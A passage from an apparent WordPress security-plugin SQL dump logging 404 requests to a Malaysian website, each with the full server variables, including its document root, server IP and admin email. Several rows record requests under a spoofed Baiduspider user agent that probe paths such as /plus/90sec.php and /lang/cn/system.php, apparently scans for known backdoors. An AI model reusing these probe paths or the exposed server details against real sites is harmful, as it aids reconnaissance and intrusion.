15:11:30',35427424,37238528,'https://bintara.com.my/?page_id=18/rss/news/index.xml',1,0,'103.57.195.27'),(27643,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:142:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.40,gzip(gfe)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"178.32.236.81\";s:11:\"REMOTE_PORT\";s:5:\"57129\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZtciGm4ola1qjywyRVyPgAAAEM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570462856.841\";s:12:\"REQUEST_TIME\";s:10:\"1570462856\";}}','notice','2019-10-07 15:40:59','2019-10-07 15:40:57',35416920,37215928,'https://bintara.com.my/?page_id=18',1,0,'178.32.236.81'),(27640,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"/blog/tag/logitech-vc/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:44:\"https://bintara.com.my/blog/tag/logitech-vc/\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZs8UaNnKQNBk6r3IXlLMAAAAQU\";s:12:\"REDIRECT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:11:\"REMOTE_ADDR\";s:13:\"207.46.13.128\";s:11:\"REMOTE_PORT\";s:5:\"16136\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:44:\"https://bintara.com.my/blog/tag/logitech-vc/\";s:10:\"SCRIPT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZs8UaNnKQNBk6r3IXlLMAAAAQU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570454609.7307\";s:12:\"REQUEST_TIME\";s:10:\"1570454609\";}}','notice','2019-10-07 13:23:31','2019-10-07 13:23:30',33982384,35783040,'https://bintara.com.my/blog/tag/logitech-vc/',1,0,'207.46.13.128'),(27641,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:70:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.4639; Pro)\";s:21:\"HTTP_X_FEATUREVERSION\";s:1:\"1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:29:\"HTTP_X_MS_COOKIEURI_REQUESTED\";s:1:\"t\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.0.4639\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZs9caNnKQNBk6r3IXlMAgAAAQo\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:13:\"49.50.237.136\";s:11:\"REMOTE_PORT\";s:5:\"64202\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZs9caNnKQNBk6r3IXlMAgAAAQo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570454897.3078\";s:12:\"REQUEST_TIME\";s:10:\"1570454897\";}}','notice','2019-10-07 13:28:19','2019-10-07 13:28:17',35788488,37584384,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'49.50.237.136'),(27823,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:59:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/plus/ad_js.php?aid=8888\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:11:\"70.78.50.92\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=f57241d5dcb66238efb0186cfbbd6447\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:11:\"70.78.50.92\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/ad_js.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/ad_js.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YCuBT1onqG4TOWhlFtAAAAQs\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/ad_js.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/ad_js.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YCuBT1onqG4TOWhlFtAAAAQs\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/ad_js.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/plus/ad_js.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6YCuBT1onqG4TOWhlFtAAAAQs\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"59667\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/ad_js.php\";s:10:\"SCRIPT_URL\";s:15:\"/plus/ad_js.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6YCuBT1onqG4TOWhlFtAAAAQs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674698.1534\";s:12:\"REQUEST_TIME\";s:10:\"1570674698\";}}','notice','2019-10-10 02:31:39','2019-10-10 02:31:38',35054608,36856808,'https://bintara.com.my/plus/ad_js.php?aid=8888',1,0,'70.78.50.92'),(27822,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:59:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/plus/90sec.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:14:\"43.118.157.167\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=fe483b30adebdc5afad85527679b4b86\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"43.118.157.167\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/90sec.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/90sec.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YAX6YXSDJF91Gv2PySQAAABg\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/90sec.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/90sec.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YAX6YXSDJF91Gv2PySQAAABg\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/90sec.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/plus/90sec.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6YAX6YXSDJF91Gv2PySQAAABg\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"59311\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/90sec.php\";s:10:\"SCRIPT_URL\";s:15:\"/plus/90sec.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6YAX6YXSDJF91Gv2PySQAAABg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674689.2891\";s:12:\"REQUEST_TIME\";s:10:\"1570674689\";}}','notice','2019-10-10 02:31:30','2019-10-10 02:31:29',35053824,36861240,'https://bintara.com.my/plus/90sec.php',1,0,'43.118.157.167'),(27821,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:59:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/plus/90000.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:13:\"52.177.175.81\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=5b7d309d2979facd9478a2d8040252a6\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"52.177.175.81\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/90000.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/90000.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6X@OBT1onqG4TOWhlFpQAAAQ4\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/90000.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/90000.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6X@OBT1onqG4TOWhlFpQAAAQ4\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/90000.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/plus/90000.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6X@OBT1onqG4TOWhlFpQAAAQ4\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"58980\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/90000.php\";s:10:\"SCRIPT_URL\";s:15:\"/plus/90000.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6X@OBT1onqG4TOWhlFpQAAAQ4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674680.4669\";s:12:\"REQUEST_TIME\";s:10:\"1570674680\";}}','notice','2019-10-10 02:31:22','2019-10-10 02:31:20',35043072,36856200,'https://bintara.com.my/plus/90000.php',1,0,'52.177.175.81'),(27820,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:65:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"/lang/cn/system.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:13:\"122.18.215.98\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=2d6d93e0198ffd795d4f06838ae0ca1e\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"122.18.215.98\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:41:\"https://bintara.com.my/lang/cn/system.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:19:\"/lang/cn/system.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6X6OBT1onqG4TOWhlFnQAAARI\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:41:\"https://bintara.com.my/lang/cn/system.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:19:\"/lang/cn/system.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6X6OBT1onqG4TOWhlFnQAAARI\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:41:\"https://bintara.com.my/lang/cn/system.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:19:\"/lang/cn/system.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6X6OBT1onqG4TOWhlFnQAAARI\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"https://bintara.com.my/lang/cn/system.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/lang/cn/system.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6X6OBT1onqG4TOWhlFnQAAARI\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"58289\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"https://bintara.com.my/lang/cn/system.php\";s:10:\"SCRIPT_URL\";s:19:\"/lang/cn/system.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\